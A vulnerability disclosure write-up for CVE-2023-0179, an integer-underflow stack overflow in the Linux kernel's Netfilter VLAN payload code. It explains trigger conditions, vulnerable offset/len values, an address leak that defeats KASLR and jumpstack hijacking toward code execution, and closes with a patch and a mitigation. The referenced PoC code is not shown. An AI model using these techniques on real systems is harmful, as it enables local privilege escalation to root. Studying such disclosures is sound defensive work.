While auditing the Linux kernel (
1b929c02afd37871d5afb9d498426f83432e71c2), I found a buffer overflow vulnerability within the Netfilter subsystem which has been assigned CVE-2023-0179.
CVE-2023-0179 is exploitable starting from commit
f6ae9f1 up to commit
The exploitation could allow the leakage of both stack and heap addresses and, potentially, a Local Privilege Escalation to the root user via arbitrary code execution.
The vulnerability consists of a stack buffer overflow due to an integer underflow vulnerability inside the
nft_payload_copy_vlan function, which is invoked with
nft_payload expressions as long as a VLAN tag is present in the current skb.
The checks at (0) look for a second VLAN tag from the
EtherType field and, if the offset falls between the first
VLAN_ETH_HLEN bytes and
VLAN_ETH_HLEN plus the size of another VLAN header, then nftables should also try and process the second VLAN.
At (1) the if statement correctly checks the boundary of the header using the offset and
len variables (8-bit unsigned ints), evaluating to true whenever offset + len exceeds the double-tagged VLAN header.
The use of inline statements successfully prevents wrappings because u8 types are automatically promoted before the comparison.
However, on the next line, the subtraction at (2) does not grant type promotion, and
ethlen (u8) may wrap to
UINT8_MAX under certain conditions.
Some examples of vulnerable offset and len pairs are:
offset: 19 & len: 4 & ethlen = 251
offset: 16 & len: 19 & ethlen = 254
offset: 20 & len: 32 & ethlen = 250
Other pairs can be listed with the following algorithm:
Finally, at (3) an up to 255-byte buffer gets copied to the destination register located on the stack, overwriting the adjacent memory.
Since we can control the destination register, we can pick
NFT_REG32_15 to trigger a 251-byte OOB write on the stack (since
NFT_REG32_15 occupies 4 bytes).
The vulnerable code path can be reached if the function
skb_vlan_tag_present(skb) evaluates to true, that is if the
skb->vlan_tci field is set. This is known to happen when the host is placed inside a VLAN, although a modified skb could also be forged manually. (perhaps by forging the packet itself or with some other
nft_expr that can edit packets?)
The calling function is
nft_payload_eval which evaluates the Nftables expression:
At (0) dest is set to the chosen destination register, where the payload expression will store its result.
If the payload offset base is
NFT_PAYLOAD_LL_HEADER (1) and a mac header is present, the vulnerable code path will be taken (2).
Furthermore, the kernel must be built with the configuration
CONFIG_VLAN_8021Q enabled, and the
CAP_NET_ADMIN capability must be enabled, which can be accomplished by entering a new user namespace beforehand.
Info leak: Exploitation details
The exploitation can be carried out in two ways:
The data leak is triggered by using
NFT_REG32_00 as the destination register, which will fill the other registers with data from the stack.
To retrieve the leaked data from the registers, multiple techniques can be applied. I chose to create an
nft_set which will store values across multiple
nft_do_chain routines, I then created 8 different
nft_dynset expressions to index all the available registers and store their values inside the set.
Finally, the nft userspace utility can be used to retrieve the set content:
gdb will help reassemble the addresses:
All the highlighted addresses can be derived from the userspace set dump and can be used to calculate the KASLR slide. The following PoC code can be used to reach this condition:
Code execution: Initial exploitation details
The second way to exploit this vulnerability involves overwriting most of the jumpstack array, which gets allocated right next to the registers in
nft_do_chain, with controlled data (
The register's content is also included in the OOB write, allowing us to overwrite the jumpstack with arbitrary rules and chains.
By repeatedly jumping to another chain, the
stackptr variable gets incremented (0) until the jumpstack entry that will end up containing our addresses has been reached, then the last chain will trigger the overflow, effectively replacing the jumpstack content and setting the verdict to
NFT_CONTINUE verdict allows us to break from the switch statement and reach (1).
At this point, the
last_rule variables will be overwritten with our controlled data (2).
The security issue is that, if the rule points to a well-formed expression that can be dereferenced, the
expr_call_ops_eval function will be called on that expression, effectively evaluating it:
The following PoC code replicates this scenario and triggers a protection fault when dereferencing our rule pointer:
Here is the jumpstack before evaluating the last chain:
and this is the jumpstack after the last chain:
Notice how the rule at (0) will be evaluated next, leading to the following panic:
For debugging purposes, the VLAN tag can be manually set with the following gdb hook after breaking at
Since the vulnerable operation in
nft_payload_copy_vlan should account for
the encapsulated VLAN tag, I suspect that the last plus sign should have been a minus since it prevents any wrapping.
I, therefore, proposed the following patch, which has been applied in commit
Mitigating the bug
If you are unable to patch this bug, disabling unprivileged user namespaces will prevent exploitation:
I will be providing the full Proof of Concept on my Github repo in the next few days.
Proof of Concept: https://github.com/TurtleARM/CVE-2023-0179-PoC
David Bouman's article on Nftables and his PoC on Github, which my code is heavily based on: https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016